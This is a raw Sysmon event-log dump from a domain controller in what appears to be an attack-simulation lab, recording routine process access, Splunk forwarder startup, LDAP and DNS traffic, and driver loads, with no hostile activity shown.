10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.136{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:16.799{266CAFBE-646C-6064-1200-00000000AE01}1196\W32TIME_ALTC:\Windows\system32\svchost.exe 354300x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49700-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49700-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.438{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49699-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.438{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49699-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.436{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49698-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.436{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49698-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.434{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60002- 23542300x80000000000000003092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.268{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=50669F8254A0F48F8D5511E12334D977,SHA256=4F9733AC69E8944D72BDF0E70F710865DB2DA251CD7D98903F27533C18EAAB95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.221{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.025{266CAFBE-648C-6064-7B00-00000000AE01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.871{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.824{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64559- 354300x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.449{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local60002- 354300x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.812{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64559- 354300x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.558{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local63663- 22542200x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.516{266CAFBE-647D-6064-3000-00000000AE01}2648win-dc-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 644600x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.159C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:40.534C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.143C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 354300x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.699{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57735- 354300x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.482{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61505- 22542200x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:16.799{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 23542300x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.111{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=50DFD9C754F9AE7407C4295EBC5545B4,SHA256=E5D3E4C59A3936529FDFE648E7CF91491E9FE492276E970FF12B2E82E2DEB392,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.714{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local57735- 354300x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local61505- 354300x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:17.372{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58642- 